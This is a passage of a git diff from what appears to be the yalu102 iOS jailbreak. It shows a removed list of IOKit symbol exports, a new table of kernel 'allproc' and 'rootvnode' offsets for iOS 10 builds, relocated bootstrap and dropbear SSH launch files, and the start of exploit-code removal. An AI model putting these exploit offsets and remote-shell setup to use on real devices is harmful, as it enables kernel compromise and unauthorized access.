_IOServiceOpen, _IOServiceOpenAsFileDescriptor, - _IOServiceRequestProbe, _IOServiceWaitQuiet, _IOSetNotificationPort, - _IOURLCreateDataAndPropertiesFromResource, _IOURLCreatePropertyFromResource, - _IOUSBDevicDeviceDescriptionGetTypeID, _IOUSBDeviceControllerCreate, - _IOUSBDeviceControllerCreateDefaultDescription, - _IOUSBDeviceControllerCreateWithService, _IOUSBDeviceControllerForceOffBus, - _IOUSBDeviceControllerGetService, _IOUSBDeviceControllerGetTypeID, - _IOUSBDeviceControllerGoOffAndOnBus, _IOUSBDeviceControllerRegisterArrivalCallback, - _IOUSBDeviceControllerRemoveArrivalCallback, _IOUSBDeviceControllerSendCommand, - _IOUSBDeviceControllerSetDescription, _IOUSBDeviceControllerSetPreferredConfiguration, - _IOUSBDeviceDataCreate, _IOUSBDeviceDataGetBytePtr, - _IOUSBDeviceDataGetCapacity, _IOUSBDeviceDataGetMapToken, - _IOUSBDeviceDataGetTypeID, _IOUSBDeviceDescriptionAppendConfiguration, - _IOUSBDeviceDescriptionAppendConfigurationWithInterface, - _IOUSBDeviceDescriptionAppendConfigurationWithInterfaces, - _IOUSBDeviceDescriptionAppendConfigurationWithoutAttributes, - _IOUSBDeviceDescriptionAppendInterfaceToConfiguration, - _IOUSBDeviceDescriptionAppendInterfacesToConfiguration, - _IOUSBDeviceDescriptionCopyInterfaces, _IOUSBDeviceDescriptionCreate, - _IOUSBDeviceDescriptionCreateFromController, _IOUSBDeviceDescriptionCreateFromControllerWithType, - _IOUSBDeviceDescriptionCreateFromDefaults, _IOUSBDeviceDescriptionCreateFromDefaultsAndController, - _IOUSBDeviceDescriptionCreateWithConfigurationInterfaces, - _IOUSBDeviceDescriptionCreateWithType, _IOUSBDeviceDescriptionGetAllowOverride, - _IOUSBDeviceDescriptionGetClass, _IOUSBDeviceDescriptionGetManufacturerString, - _IOUSBDeviceDescriptionGetMatchingConfiguration, - _IOUSBDeviceDescriptionGetProductID, _IOUSBDeviceDescriptionGetProductString, - _IOUSBDeviceDescriptionGetProtocol, _IOUSBDeviceDescriptionGetSerialString, - _IOUSBDeviceDescriptionGetSubClass, _IOUSBDeviceDescriptionGetVendorID, - _IOUSBDeviceDescriptionGetVersion, _IOUSBDeviceDescriptionRemoveAllConfigurations, - _IOUSBDeviceDescriptionSetAllowOverride, _IOUSBDeviceDescriptionSetClass, - _IOUSBDeviceDescriptionSetProductID, _IOUSBDeviceDescriptionSetProtocol, - _IOUSBDeviceDescriptionSetSerialString, _IOUSBDeviceDescriptionSetSubClass, - _IOUSBDeviceDescriptionSetVendorID, _NXClickTime, - _NXCloseEventStatus, _NXEventSystemInfo, _NXGetClickSpace, - _NXGetKeyMapping, _NXKeyMappingLength, _NXKeyRepeatInterval, - _NXKeyRepeatThreshold, _NXOpenEventStatus, _NXResetKeyboard, - _NXResetMouse, _NXSetClickSpace, _NXSetClickTime, - _NXSetKeyMapping, _NXSetKeyRepeatInterval, _NXSetKeyRepeatThreshold, - _OSGetNotificationFromMessage, _OSKextAuthenticate, - _OSKextAuthenticateDependencies, _OSKextCopyAllDependencies, - _OSKextCopyAllRequestedIdentifiers, _OSKextCopyArchitectures, - _OSKextCopyContainerForPluginKext, _OSKextCopyDeclaredDependencies, - _OSKextCopyDependents, _OSKextCopyDiagnostics, _OSKextCopyExecutableForArchitecture, - _OSKextCopyIndirectDependencies, _OSKextCopyInfoDictionary, - _OSKextCopyKextsWithIdentifier, _OSKextCopyKextsWithIdentifiers, - _OSKextCopyLinkDependencies, _OSKextCopyLoadList, - _OSKextCopyLoadListForKexts, _OSKextCopyLoadedKextInfo, - _OSKextCopyPersonalitiesArray, _OSKextCopyPersonalitiesOfKexts, - _OSKextCopyPlugins, _OSKextCopyResource, _OSKextCopyUUIDForArchitecture, - _OSKextCreate, _OSKextCreateKextsFromMkextData, - _OSKextCreateKextsFromMkextFile, _OSKextCreateKextsFromURL, - _OSKextCreateKextsFromURLs, _OSKextCreateLoadedKextInfo, - _OSKextCreateMkext, _OSKextCreateWithIdentifier, - _OSKextDeclaresExecutable, _OSKextDependenciesAreLoadableInSafeBoot, - _OSKextDependsOnKext, _OSKextFilterRequiredKexts, - _OSKextFindLinkDependencies, _OSKextFlushDependencies, - _OSKextFlushDiagnostics, _OSKextFlushInfoDictionary, - _OSKextFlushLoadInfo, _OSKextGetActualSafeBoot, - _OSKextGetAllKexts, _OSKextGetArchitecture, _OSKextGetCompatibleKextWithIdentifier, - _OSKextGetCompatibleVersion, _OSKextGetIdentifier, - _OSKextGetKextWithIdentifier, _OSKextGetKextWithIdentifierAndVersion, - _OSKextGetKextWithURL, _OSKextGetLoadAddress, _OSKextGetLoadTag, - _OSKextGetLoadedKextWithIdentifier, _OSKextGetLogFilter, - _OSKextGetRecordsDiagnostics, _OSKextGetRunningKernelArchitecture, - _OSKextGetSimulatedSafeBoot, _OSKextGetSystemExtensionsFolderURLs, - _OSKextGetTypeID, _OSKextGetURL, _OSKextGetUsesCaches, - _OSKextGetValueForInfoDictionaryKey, _OSKextGetVersion, - _OSKextHasLogOrDebugFlags, _OSKextIsAuthentic, _OSKextIsCompatibleWithVersion, - _OSKextIsFromMkext, _OSKextIsInterface, _OSKextIsKernelComponent, - _OSKextIsLibrary, _OSKextIsLoadable, _OSKextIsLoadableInSafeBoot, - _OSKextIsLoaded, _OSKextIsLoggingEnabled, _OSKextIsPlugin, - _OSKextIsStarted, _OSKextIsValid, _OSKextLoad, _OSKextLoadWithOptions, - _OSKextLog, _OSKextLogCFString, _OSKextLogDependencyGraph, - _OSKextLogDiagnostics, _OSKextMatchesRequiredFlags, - _OSKextOtherVersionIsLoaded, _OSKextParseVersionCFString, - _OSKextParseVersionString, _OSKextReadLoadedKextInfo, - _OSKextRemoveKextPersonalitiesFromKernel, _OSKextRemovePersonalitiesForIdentifierFromKernel, - _OSKextResolveDependencies, _OSKextSendKextPersonalitiesToKernel, - _OSKextSendPersonalitiesOfKextsToKernel, _OSKextSendPersonalitiesToKernel, - _OSKextSetArchitecture, _OSKextSetLoadAddress, _OSKextSetLogFilter, - _OSKextSetLogOutputFunction, _OSKextSetLoggingEnabled, - _OSKextSetRecordsDiagnostics, _OSKextSetSimulatedSafeBoot, - _OSKextSetUsesCaches, _OSKextStart, _OSKextStop, - _OSKextSupportsArchitecture, _OSKextUnload, _OSKextUnloadKextWithIdentifier, - _OSKextVLog, _OSKextVLogCFString, _OSKextValidate, - _OSKextValidateDependencies, _OSKextVersionGetString, - __CFURLCopyAbsolutePath, __IOAVStringAppendIndendationAndFormat, - __IODataQueueEnqueueWithReadCallback, __IODispatchCalloutWithDispatch, - __IOHIDCallbackApplier, __IOHIDCopyServiceIDs, __IOHIDCreateBinaryData, - __IOHIDDeviceGetIOCFPlugInInterface, __IOHIDElementCreateWithElement, - __IOHIDElementCreateWithParentAndData, __IOHIDElementGetCalibrationInfo, - __IOHIDElementGetFlags, __IOHIDElementGetLength, - __IOHIDElementGetValue, __IOHIDElementSetDevice, - __IOHIDElementSetDeviceInterface, __IOHIDElementSetValue, - __IOHIDEventCopyCFTypeContext, __IOHIDEventGetContext, - __IOHIDEventSetCFTypeContext, __IOHIDEventSetContext, - __IOHIDEventSystemAddConnection, __IOHIDEventSystemAddService, - __IOHIDEventSystemAddServiceForConnection, __IOHIDEventSystemClientCopyClientRecords, - __IOHIDEventSystemClientCopyEventForService, __IOHIDEventSystemClientCopyPropertyForService, - __IOHIDEventSystemClientCopyServiceRecords, __IOHIDEventSystemClientDispatchEventFilter, - __IOHIDEventSystemClientDispatchPropertiesChanged, - __IOHIDEventSystemClientRegisterClientRecordsChangedBlock, - __IOHIDEventSystemClientRegisterClientRecordsChangedCallback, - __IOHIDEventSystemClientRegisterServiceRecordsChangedBlock, - __IOHIDEventSystemClientRegisterServiceRecordsChangedCallback, - __IOHIDEventSystemClientServiceConformsTo, __IOHIDEventSystemClientSetElementValueForService, - __IOHIDEventSystemClientSetPropertyForService, __IOHIDEventSystemClientUnregisterClientRecordsChangedBlock, - __IOHIDEventSystemClientUnregisterClientRecordsChangedCallback, - __IOHIDEventSystemClientUnregisterServiceRecordsChangedBlock, - __IOHIDEventSystemClientUnregisterServiceRecordsChangedCallback, - __IOHIDEventSystemConnectionAddNotification, __IOHIDEventSystemConnectionAddServices, - __IOHIDEventSystemConnectionContainsEntitlement, - __IOHIDEventSystemConnectionContainsService, __IOHIDEventSystemConnectionCopyQueue, - __IOHIDEventSystemConnectionCopyRecord, __IOHIDEventSystemConnectionCopyServices, - __IOHIDEventSystemConnectionCreate, __IOHIDEventSystemConnectionEventFilterCompare, - __IOHIDEventSystemConnectionFilterEvent, __IOHIDEventSystemConnectionGetEventFilterPriority, - __IOHIDEventSystemConnectionGetExecutablePath, __IOHIDEventSystemConnectionGetPID, - __IOHIDEventSystemConnectionGetPort, __IOHIDEventSystemConnectionGetReplyPort, - __IOHIDEventSystemConnectionGetSystem, __IOHIDEventSystemConnectionPropertyChanged, - __IOHIDEventSystemConnectionQueueStart, __IOHIDEventSystemConnectionQueueStop, - __IOHIDEventSystemConnectionRecordClientChanged, - __IOHIDEventSystemConnectionRecordServiceChanged, - __IOHIDEventSystemConnectionRegisterDemuxCallback, - __IOHIDEventSystemConnectionRegisterEventFilter, - __IOHIDEventSystemConnectionRegisterPropertyChangedNotification, - __IOHIDEventSystemConnectionRegisterRecordClientChanged, - __IOHIDEventSystemConnectionRegisterRecordServiceChanged, - __IOHIDEventSystemConnectionRegisterTerminationCallback, - __IOHIDEventSystemConnectionRemoveAllServices, __IOHIDEventSystemConnectionRemoveNotification, - __IOHIDEventSystemConnectionRemoveService, __IOHIDEventSystemConnectionScheduleAsync, - __IOHIDEventSystemConnectionSetQueue, __IOHIDEventSystemConnectionUnregisterEventFilter, - __IOHIDEventSystemConnectionUnregisterPropertyChangedNotification, - __IOHIDEventSystemConnectionUnregisterRecordClientChanged, - __IOHIDEventSystemConnectionUnregisterRecordServiceChanged, - __IOHIDEventSystemConnectionUnscheduleAsync, __IOHIDEventSystemCopyRecord, - __IOHIDEventSystemDispatchEvent, __IOHIDEventSystemGetPropertyForConnection, - __IOHIDEventSystemPropertyChanged, __IOHIDEventSystemRegisterEventFilter, - __IOHIDEventSystemRegisterRecordClientChanged, __IOHIDEventSystemRegisterRecordServiceChanged, - __IOHIDEventSystemRemoveConnection, __IOHIDEventSystemRemoveService, - __IOHIDEventSystemRemoveServicesForConnection, __IOHIDEventSystemSetPropertyForConnection, - __IOHIDEventSystemUnregisterEventFilter, __IOHIDEventSystemUnregisterRecordClientChanged, - __IOHIDEventSystemUnregisterRecordServiceChanged, - __IOHIDHasEntitlement, __IOHIDLoadBundles, __IOHIDLog, - __IOHIDQueueCopyElements, __IOHIDSerialize, __IOHIDServiceAddConnection, - __IOHIDServiceClientCreate, __IOHIDServiceClientDispatchServiceRemoval, - __IOHIDServiceClientRefresh, __IOHIDServiceClose, - __IOHIDServiceContainsReportInterval, __IOHIDServiceContainsReportIntervalForClient, - __IOHIDServiceCopyConnections, __IOHIDServiceCopyDebugDescriptionForClient, - __IOHIDServiceCopyDispatchQueue, __IOHIDServiceCopyPropertyForClient, - __IOHIDServiceCopyRecordForClient, __IOHIDServiceCreate, - __IOHIDServiceCreateVirtual, __IOHIDServiceGetEventDeadlineForClient, - __IOHIDServiceGetOwner, __IOHIDServiceGetReportInterval, - __IOHIDServiceGetReportIntervalForClient, __IOHIDServiceIsInactive, - __IOHIDServiceOpen, __IOHIDServiceRemoveConnection, - __IOHIDServiceRemovePropertiesForClient, __IOHIDServiceScheduleAsync, - __IOHIDServiceSetBatchIntervalForClient, __IOHIDServiceSetEventCallback, - __IOHIDServiceSetEventDeadlineForClient, __IOHIDServiceSetPropertyForClient, - __IOHIDServiceSetReportIntervalForClient, __IOHIDServiceUnscheduleAsync, - __IOHIDSessionDispatchEvent, __IOHIDSessionGetPropertyForClient, - __IOHIDSessionSetPropertyForClient, __IOHIDStringAppendIndendationAndFormat, - __IOHIDUnserializeAndVMDealloc, __IOHIDUnserializeAndVMDeallocWithTypeID, - __IOHIDValueCopyToElementValuePtr, __IOHIDValueCreateWithElementValuePtr, - __IOHIDValueCreateWithStruct, __IOObjectCFRelease, - __IOObjectCFRetain, __IOObjectConformsTo, __IOObjectCopyClass, - __IOObjectGetClass, __IOReadBytesFromFile, __IOServiceGetAuthorizationID, - __IOServiceSetAuthorizationID, __IOUSBDeviceDescriptionGetInfo, - __IOWriteBytesToFile, __OSKextCopyKernelRequests, - __OSKextCreateFolderForCacheURL, __OSKextReadCache, - __OSKextReadFromIdentifierCacheForFolder, __OSKextSendResource, - __OSKextSetStrictRecordingByLastOpened, __OSKextWriteCache, - __OSKextWriteIdentifierCacheForKextsInDirectory, - ___CachedPropertiesRefreshApplierFunction, ___ConnectionFunctionPickBatchInterval, - ___GDBIOHIDEventSystemDump, ___IOHIDApplyPropertiesToDeviceFromDictionary, - ___IOHIDApplyPropertyToDeviceSet, ___IOHIDDeviceGetRootKey, - ___IOHIDDeviceGetUUIDKey, ___IOHIDDeviceGetUUIDString, - ___IOHIDDeviceLoadProperties, ___IOHIDDeviceSaveProperties, - ___IOHIDElementGetRootKey, ___IOHIDElementLoadProperties, - ___IOHIDElementRegister, ___IOHIDElementSaveProperties, - ___IOHIDEventSystemClientRefresh, ___IOHIDEventSystemClientRefreshServiceCallback, - ___IOHIDEventSystemClientServiceReplaceCallback, - ___IOHIDEventSystem_debug, ___IOHIDLoadElementSet, - ___IOHIDManagerGetRootKey, ___IOHIDManagerLoadProperties, - ___IOHIDManagerRegister, ___IOHIDManagerSaveProperties, - ___IOHIDNotificationRegister, ___IOHIDPropertyLoadDictionaryFromKey, - ___IOHIDPropertyLoadFromKeyWithSpecialKeys, ___IOHIDPropertySaveToKeyWithSpecialKeys, - ___IOHIDPropertySaveWithContext, ___IOHIDQueueRegister, - ___IOHIDSaveDeviceSet, ___IOHIDSaveElementSet, ___IOHIDServicePickBatchInterval, - ___IOHIDSession, ___IOHIDSessionRef, ___IOHIDTransactionRegister, - ___IOHIDValueRegister, ___IOUSBDeviceDescriptionRegister, - ___OSKextBundleIDCompare, ___OSKextCacheNeedsUpdate, - ___OSKextCheckURL, ___OSKextClearHasAllDependenciesOnKext, - ___OSKextCompareIdentifiers, ___OSKextCopyExecutableRelativePath, - ___OSKextCreateCacheFileURL, ___OSKextCreateCompositeKey, - ___OSKextCreateFromIdentifierCacheDict, ___OSKextCreateIdentifierCacheDict, - ___OSKextCreateKextRequest, ___OSKextDeallocateMmapBuffer, - ___OSKextGetBleedthroughFlag, ___OSKextLogDependencyGraphApplierFunction, - ___OSKextLogKernelMessages, ___OSKextMapExecutable, - ___OSKextProcessKextRequestResults, ___OSKextReadRegistryNumberProperty, - ___OSKextRealize, ___OSKextRealizeKextsWithIdentifier, - ___OSKextRemoveIdentifierCacheForKext, ___OSKextRemovePersonalities, - ___OSKextSendKextRequest, ___OSKextSetLoadAddress, - ___OSKextStatURL, ___OSKextStatURLsOrURL, ___OSKextURLIsSystemFolder, - ___OSKextUUIDCallback, ___OSKextUnload, ___SetNumPropertyForService, - ___absPathOnVolume, ___kOSKextDiagnosticsFlagAllImplemented, - ___sOSKextDefaultLogFunction, ___sOSKextLogOutputFunction, - ___uuid_callback, __io_hideventsystem_clear_service_cache, - __io_hideventsystem_copy_client_records, __io_hideventsystem_copy_event_for_service, - __io_hideventsystem_copy_matching_services, __io_hideventsystem_copy_property, - __io_hideventsystem_copy_property_for_service, __io_hideventsystem_copy_service_records, - __io_hideventsystem_dispatch_event, __io_hideventsystem_open, - __io_hideventsystem_queue_create, __io_hideventsystem_queue_start, - __io_hideventsystem_queue_stop, __io_hideventsystem_register_event_filter, - __io_hideventsystem_register_property_changed_notification, - __io_hideventsystem_register_record_client_changed_notification, - __io_hideventsystem_register_record_service_changed_notification, - __io_hideventsystem_release_notification, __io_hideventsystem_service_conforms_to, - __io_hideventsystem_set_element_value_for_service, - __io_hideventsystem_set_properties, __io_hideventsystem_set_properties_for_service, - __io_hideventsystem_unregister_event_filter, __io_hideventsystem_unregister_property_changed_notification, - __io_hideventsystem_unregister_record_client_changed_notification, - __io_hideventsystem_unregister_record_service_changed_notification, - __io_kSCCompAnyRegex, __io_kSCDynamicStoreDomainState, - __iohideventsystem_client_dispatch_client_records_changed, - __iohideventsystem_client_dispatch_event_filter, - __iohideventsystem_client_dispatch_notification_results, - __iohideventsystem_client_dispatch_properties_changed, - __iohideventsystem_client_dispatch_service_records_changed, - __iohideventsystem_client_dispatch_service_removal, - __iohideventsystem_client_subsystem, __iohideventsystem_subsystem, - __isArray, __isDictionary, __isString, __pm_connect, - __pm_disconnect, _createCFStringForData, _createCFStringForPlist_new, - _createUTF8CStringForCFString, _defaultSettings, - _ev_try_lock, _ev_unlock, _fat_iterator_close, _fat_iterator_file_end, - _fat_iterator_file_start, _fat_iterator_find_arch, - _fat_iterator_find_fat_arch, _fat_iterator_find_host_arch, - _fat_iterator_for_data, _fat_iterator_is_iterable, - _fat_iterator_next_arch, _fat_iterator_num_arches, - _fat_iterator_open, _fat_iterator_reset, _gIOCFPlugInInterfaceID, - _gIOKitLibSerializeOptions, _gIOKitLibServerVersion, - _getEffectivePageSize, _hid_dispatch_pthread_root_queue_create, - _hid_dispatch_queue_create, _hid_dispatch_queue_release, - _hid_pthread_attr_init, _io_hideventsystem_clear_service_cache, - _io_hideventsystem_copy_client_records, _io_hideventsystem_copy_event_for_service, - _io_hideventsystem_copy_matching_services, _io_hideventsystem_copy_property, - _io_hideventsystem_copy_property_for_service, _io_hideventsystem_copy_service_records, - _io_hideventsystem_dispatch_event, _io_hideventsystem_open, - _io_hideventsystem_queue_create, _io_hideventsystem_queue_start, - _io_hideventsystem_queue_stop, _io_hideventsystem_register_event_filter, - _io_hideventsystem_register_property_changed_notification, - _io_hideventsystem_register_record_client_changed_notification, - _io_hideventsystem_register_record_service_changed_notification, - _io_hideventsystem_release_notification, _io_hideventsystem_service_conforms_to, - _io_hideventsystem_set_element_value_for_service, - _io_hideventsystem_set_properties, _io_hideventsystem_set_properties_for_service, - _io_hideventsystem_unregister_event_filter, _io_hideventsystem_unregister_property_changed_notification, - _io_hideventsystem_unregister_record_client_changed_notification, - _io_hideventsystem_unregister_record_service_changed_notification, - _io_pm_assertion_activity_aggregate, _io_pm_assertion_activity_log, - _io_pm_assertion_copy_details, _io_pm_assertion_create, - _io_pm_assertion_notify, _io_pm_assertion_retain_release, - _io_pm_assertion_set_properties, _io_pm_cancel_repeat_events, - _io_pm_change_sa_assertion_behavior, _io_pm_connection_acknowledge_event, - _io_pm_connection_copy_status, _io_pm_connection_create, - _io_pm_connection_release, _io_pm_connection_schedule_notification, - _io_pm_ctl_assertion_type, _io_pm_declare_network_client_active, - _io_pm_declare_system_active, _io_pm_declare_user_active, - _io_pm_force_active_settings, _io_pm_get_capability_bits, - _io_pm_get_uuid, _io_pm_get_value_int, _io_pm_hid_event_copy_history, - _io_pm_hid_event_report_activity, _io_pm_last_wake_time, - _io_pm_schedule_power_event, _io_pm_schedule_repeat_event, - _io_pm_set_active_profile, _io_pm_set_bt_wake_interval, - _io_pm_set_debug_flags, _io_pm_set_dw_linger_interval, - _io_pm_set_sleepservice_wake_time_cap, _io_pm_set_value_int, - _io_ps_copy_chargelog, _io_ps_copy_powersources_info, - _io_ps_new_pspowersource, _io_ps_release_pspowersource, - _io_ps_update_pspowersource, _iohideventsystem_client_dispatch_client_records_changed, - _iohideventsystem_client_dispatch_event_filter, - _iohideventsystem_client_dispatch_notification_results, - _iohideventsystem_client_dispatch_properties_changed, - _iohideventsystem_client_dispatch_service_records_changed, - _iohideventsystem_client_dispatch_service_removal, - _iohideventsystem_client_server, _iohideventsystem_client_server_routine, - _iohideventsystem_server, _iohideventsystem_server_routine, - _iokit_user_client_trap, _isCrossLinking, _kIOEthernetHardwareAddress, - _kIOHIDEventSystemConnectionDispatchFilterWaitTimeoutMS, - _kIOHIDFilterPluginArrayCallBacks, _kIOHIDServerConnectionRootQueue, - _kIOHIDServiceEnumerationRootQueue, _kIOHIDServiceInterruptRootQueue, - _kIOMasterPortDefault, _kIOUserEthernetInterfaceMergeProperties, - _kIOUserEthernetInterfaceRole, _kOSKextDependencyCircularReference, - _kOSKextDependencyCompatibleVersionUndeclared, _kOSKextDependencyInauthentic, - _kOSKextDependencyIndirectDependencyUnresolvable, - _kOSKextDependencyIneligibleInSafeBoot, _kOSKextDependencyInvalid, - _kOSKextDependencyLoadedCompatibleVersionUndeclared, - _kOSKextDependencyLoadedIsIncompatible, _kOSKextDependencyMultipleVersionsDetected, - _kOSKextDependencyNoCompatibleVersion, _kOSKextDependencyRawAndComponentKernel, - _kOSKextDependencyUnavailable, _kOSKextDiagnosticBadPropertyListXMLKey, - _kOSKextDiagnosticBadSystemPropertyKey, _kOSKextDiagnosticBundleIdentifierMismatchKey, - _kOSKextDiagnosticBundleVersionMismatchKey, _kOSKextDiagnosticCodelessWithLibrariesKey, - _kOSKextDiagnosticCompatibleVersionLaterThanVersionKey, - _kOSKextDiagnosticDeclaresBothKernelAndKPIDependenciesKey, - _kOSKextDiagnosticDeclaresNoKPIsWarningKey, _kOSKextDiagnosticDeclaresNonKPIDependenciesKey, - _kOSKextDiagnosticDeprecatedPropertyKey, _kOSKextDiagnosticExecutableArchNotFoundKey, - _kOSKextDiagnosticExecutableBadKey, _kOSKextDiagnosticExecutableMissingKey, - _kOSKextDiagnosticFileAccessKey, _kOSKextDiagnosticFileNotFoundKey, - _kOSKextDiagnosticIdentifierOrVersionTooLongKey, - _kOSKextDiagnosticIneligibleInSafeBoot, _kOSKextDiagnosticKernelComponentNotInterfaceKey, - _kOSKextDiagnosticMissingPropertyKey, _kOSKextDiagnosticNoExplicitKernelDependencyKey, - _kOSKextDiagnosticNoFileKey, _kOSKextDiagnosticNonAppleKextDeclaresPrivateKPIDependencyKey, - _kOSKextDiagnosticNonuniqueIOResourcesMatchKey, - _kOSKextDiagnosticNotABundleKey, _kOSKextDiagnosticNotSignedKey, - _kOSKextDiagnosticOwnerPermissionKey, _kOSKextDiagnosticPersonalityHasDifferentBundleIdentifierKey, - _kOSKextDiagnosticPersonalityHasNoBundleIdentifierKey, - _kOSKextDiagnosticPersonalityNamesKextWithNoExecutableKey, - _kOSKextDiagnosticPersonalityNamesNonloadableKextKey, - _kOSKextDiagnosticPersonalityNamesUnknownKextKey, - _kOSKextDiagnosticPropertyIsIllegalTypeKey, _kOSKextDiagnosticPropertyIsIllegalValueKey, - _kOSKextDiagnosticRawKernelDependency, _kOSKextDiagnosticSharedExecutableAndExecutableKey, - _kOSKextDiagnosticSharedExecutableKextMissingKey, - _kOSKextDiagnosticStatFailureKey, _kOSKextDiagnosticSymlinkKey, - _kOSKextDiagnosticTypeWarningKey, _kOSKextDiagnosticURLConversionKey, - _kOSKextDiagnosticsAuthenticationKey, _kOSKextDiagnosticsBootLevelKey, - _kOSKextDiagnosticsDependenciesKey, _kOSKextDiagnosticsDependencyNotOSBundleRequired, - _kOSKextDiagnosticsInterfaceDependencyCount, _kOSKextDiagnosticsValidationKey, - _kOSKextDiagnosticsWarningsKey, _kOSKextLoadNotification, - _kOSKextUnloadNotification, _macho_find_dysymtab, - _macho_find_section_numbered, _macho_find_source_version, - _macho_find_symbol, _macho_find_symtab, _macho_find_uuid, - _macho_get_section_by_name, _macho_get_section_by_name_64, - _macho_get_segment_by_name, _macho_get_segment_by_name_64, - _macho_remove_linkedit, _macho_scan_load_commands, - _macho_swap, _macho_trim_linkedit, _macho_unswap, - _previouslySerialized, _printPList_new, _recordObjectInIDRefDictionary, - _roundPageCrossSafe, _roundPageCrossSafeFixedWidth, - _setCrossLinkPageSize, _showPList_new ] -... diff --git a/yalu102/Kernels.plist b/yalu102/Kernels.plist new file mode 100644 index 0000000..65b4300 --- /dev/null +++ b/yalu102/Kernels.plist @@ -0,0 +1,139 @@ + + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001 + + allproc + 0x5b8528 + rootvnode + 0x5be0b8 + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000 + + allproc + 0x5b8468 + rootvnode + 0x5be0b8 + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000 + + allproc + 0x5a8438 + rootvnode + 0x5ae0b8 + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X + + allproc + 0x5ac418 + rootvnode + 0x5b20b8 + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010 + + allproc + 0x5ec478 + rootvnode + 0x5f20b8 + + Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000 + + allproc + 0x5b8468 + rootvnode + 0x5be0b8 + + Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000 + + allproc + 0x5b8468 + rootvnode + + + Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000 + + allproc + 0x5b4168 + rootvnode + 0x5ba0b8 + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010 + + allproc + 0x5ec178 + rootvnode + 0x5f20b8 + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001 + + allproc + 0x5b4228 + rootvnode + 0x5ba0b8 + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000 + + allproc + 0x5b4168 + rootvnode + 0x5ba0b8 + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + + allproc + 0x5a4148 + rootvnode + 0x5aa0b8 + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + rootvnode + 0x5aa0b8 + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010 + + allproc + 0x5ec178 + rootvnode + 0x5f20b8 + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001 + + allproc + 0x5b0228 + rootvnode + 0x5b60b8 + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000 + + allproc + 0x5b0168 + rootvnode + 0x5b60b8 + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000 + + allproc + 0x5a4148 + rootvnode + 0x5aa0b8 + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + rootvnode + 0x5aa0b8 + + Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + rootvnode + 0x5aa0b8 + + + diff --git a/yalu102/Resources/.gitignore b/yalu102/Resources/.gitignore new file mode 100644 index 0000000..b7c200a --- /dev/null +++ b/yalu102/Resources/.gitignore @@ -0,0 +1 @@ +bootstrap diff --git a/yalu102/0.reload.plist b/yalu102/Resources/0.reload.plist similarity index 100% rename from yalu102/0.reload.plist rename to yalu102/Resources/0.reload.plist diff --git a/yalu102/bootstrap.tar b/yalu102/Resources/bootstrap.tar similarity index 100% rename from yalu102/bootstrap.tar rename to yalu102/Resources/bootstrap.tar diff --git a/yalu102/dropbear.plist b/yalu102/Resources/dropbear.plist similarity index 94% rename from yalu102/dropbear.plist rename to yalu102/Resources/dropbear.plist index 4cfebaa..2964bb2 100644 --- a/yalu102/dropbear.plist +++ b/yalu102/Resources/dropbear.plist @@ -3,7 +3,7 @@ Label - ShaiHulud + dropbear Program /usr/local/bin/dropbear ProgramArguments diff --git a/yalu102/launchctl b/yalu102/Resources/launchctl similarity index 100% rename from yalu102/launchctl rename to yalu102/Resources/launchctl diff --git a/yalu102/reload b/yalu102/Resources/reload similarity index 100% rename from yalu102/reload rename to yalu102/Resources/reload diff --git a/yalu102/tar b/yalu102/Resources/tar old mode 100644 new mode 100755 similarity index 100% rename from yalu102/tar rename to yalu102/Resources/tar diff --git a/yalu102/ViewController.h b/yalu102/ViewController.h index 80fe105..d7c93d5 100644 --- a/yalu102/ViewController.h +++ b/yalu102/ViewController.h @@ -9,9 +9,7 @@ #import @interface ViewController : UIViewController -{ - IBOutlet UIButton* dope; -} + - (IBAction)yolo:(id)sender; @end diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index 63328b3..86dc1e1 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m @@ -6,382 +6,79 @@ // Copyright © 2017 kimjongcracks. All rights reserved. // -#import "offsets.h" #import "ViewController.h" -#import -#import -#import -#undef __IPHONE_OS_VERSION_MIN_REQUIRED -#import -#include - -extern uint64_t procoff; - -typedef struct { - 